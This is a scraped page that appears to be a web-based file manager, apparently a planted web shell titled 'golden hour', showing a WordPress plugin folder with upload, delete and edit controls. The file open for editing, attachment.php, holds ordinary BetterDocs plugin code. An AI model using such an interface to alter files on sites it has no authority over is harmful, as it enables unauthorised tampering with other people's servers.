golden hour
/home/godaofbq/hardchambers.com/wp-content/plugins/betterdocs-pro/views/widgets
⬆️ Go Up
Upload
File/Folder
Size
Actions
attachment.php
506 B
Del
OK
handbook-list.php
1.54 KB
Del
OK
related-docs.php
93 B
Del
OK
Edit: attachment.php
<?php $shortcode_atts = betterdocs()->template_helper->shortcode_atts( [ 'attachment_heading_label' => $attachment_heading_label, 'default_attachment_name' => $default_attachment_name, 'show_attachment_icon' => $show_attachment_icon, 'show_attachment_size' => $show_attachment_size, 'show_attachments_in_new_tab' => $show_attachments_in_new_tab, 'show_attachments' => true ], '', '' ); echo do_shortcode("[betterdocs_attachments $shortcode_atts]");
Save